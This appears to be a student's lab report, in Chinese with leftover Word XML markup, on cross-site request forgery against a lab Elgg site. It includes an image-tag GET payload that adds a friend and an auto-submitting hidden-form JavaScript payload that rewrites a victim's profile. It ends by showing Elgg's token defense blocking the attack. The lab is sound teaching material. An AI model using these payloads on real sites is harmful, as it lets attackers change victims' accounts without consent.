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Task1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按实验要求启用HTTP Header Live，其能够正常使用，截图如下。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80355" cy="2703195"/>
            <wp:effectExtent l="0" t="0" r="1460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t="3945" r="5875" b="3339"/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270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POST HTTP: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18105" cy="1883410"/>
            <wp:effectExtent l="0" t="0" r="3175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8105" cy="188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GET HTTP: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41245" cy="2661920"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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r="-2507" b="1810"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2341245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Task2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登录Victim website ：www.csrflabelgg.com，登录一个非alice的账号，搜素boby。在打开HTTP Header Live的情况下点击Add friend，添加boby为好友，抓到添加boby为好友的数据流，结果如下：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45255" cy="2866390"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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其具体可以点开查看，可知boby代号为42。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编辑攻击者的网站，打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/var/www/CSRF/Attacker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向其中添加文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>index.html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72275" cy="323850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1143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向文件中写入如下内容：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&lt;html&gt;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&lt;body&gt;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&lt;h1&gt;Frankly, my dear, I don't give a damn.&lt;/h1&gt;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&lt;img src="http://www.csrflabelgg.com/action/friends/add?friend=43"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alt="img" width="1" height="1"/&gt;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&lt;body/&gt;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&lt;/html&gt;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2245" cy="1401445"/>
            <wp:effectExtent l="0" t="0" r="10795" b="63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r="14053" b="173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01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登陆 Boby 账户发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，其内容为攻击网站的url，即：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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.csrflabattacker.com" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.csrflabattacker.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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64330" cy="2758440"/>
            <wp:effectExtent l="0" t="0" r="1143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rcRect l="11564" t="28916" r="6567" b="6805"/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登陆 Alice 账户，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>起初没有好友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23105" cy="2585720"/>
            <wp:effectExtent l="0" t="0" r="3175" b="508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接着我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>打开 Boby 的博客，点击链接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60720" cy="1607820"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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跳转到如下页面。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9545" cy="1452880"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1016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rcRect r="24" b="27618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145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回到 Alice 好友界面发现多了 Boby 的好友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78045" cy="2794000"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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rcRect l="7623" t="944" r="5962" b="8528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Task3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在Alice的账号上正常进行签名更改操作，并抓取信息：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79060" cy="2981960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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POST具体信息调出为如下：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6050" cy="3055620"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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rcRect t="3820" r="954" b="6844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可看出，briefdescription的代号是2，alice代号是42。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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>修改文件/var/www/CSRF/Attacker/index.html，修改其内容为如下：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&lt;html&gt;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&lt;body&gt;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&lt;h1&gt;Frankly, my dear, I don't give a damn.&lt;/h1&gt;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&lt;script type="text/javascript"&gt;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function forge_post()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var fields;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// The following are form entries need to be filled out by attackers.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// The entries are made hidden, so the victim won’t be able to see them.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fields += "&lt;input type='hidden' name='name' value='Alice'&gt;";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fields += "&lt;input type='hidden' name='briefdescription' value='Boby is my hero.'&gt;";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fields += "&lt;input type='hidden' name='accesslevel[briefdescription]'value='2'&gt;";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fields += "&lt;input type='hidden' name='guid' value='42'&gt;";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// Create a &lt;form&gt; element.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var p = document.createElement("form");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// Construct the form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p.action = "http://www.csrflabelgg.com/action/profile/edit";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p.innerHTML = fields;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p.method = "post";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// Append the form to the current page.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document.body.appendChild(p);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// Submit the form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p.submit();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// Invoke forge_post() after the page is loaded.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window.onload = function() { forge_post();}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&lt;/script&gt;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&lt;/body&gt;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&lt;/html&gt;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截图如下：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6370" cy="3674110"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13970"/>
            <wp:docPr id="23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rcRect t="868" r="25723" b="426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之后再次点击 Boby 的博客中的链接，跳转到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.csrfattacker.com后自动跳回。然后发现签名已经被修改。" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>www.csrfattacker.com后自动跳回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。然后发现签名已经被修改。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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61865" cy="3655695"/>
            <wp:effectExtent l="0" t="0" r="8255" b="190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rcRect l="6480" t="28626" r="3204" b="6747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Task 4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按实验要求修改文件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/var/www/CSRF/Elgg/vendor/elgg/elgg/engine/classes/Elgg/ActionsService.php中的函数gatekeeper，注释掉return true。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07050" cy="2602230"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="24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然后我们像上一个Task中那样，再次点开boby博客的链接，进入 www.csrfattacker.com后，发现网页在不断自动刷新，退出网页后发现右侧提示错误：没有修改签名的权限。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55665" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="25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rcRect l="20445" t="936"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5955665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查看签名，发现并没有被修改，说明防御手段起到了作用，因为攻击者网站的代码里__elgg_ts 和__elgg_token两个字段的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值并不正确。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mbusMonL-Regu">
    <w:altName w:val="★懐流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★懐流体">
    <w:panose1 w:val="02000600000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002BF" w:usb1="68C7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="4002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3840EB"/>
    <w:rsid w:val="11F47950"/>
    <w:rsid w:val="68384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2020-09-12T07:37:00Z</dcterms:created>
  <dc:creator>23129</dc:creator>
  <cp:lastModifiedBy>23129</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-12T15:13:55Z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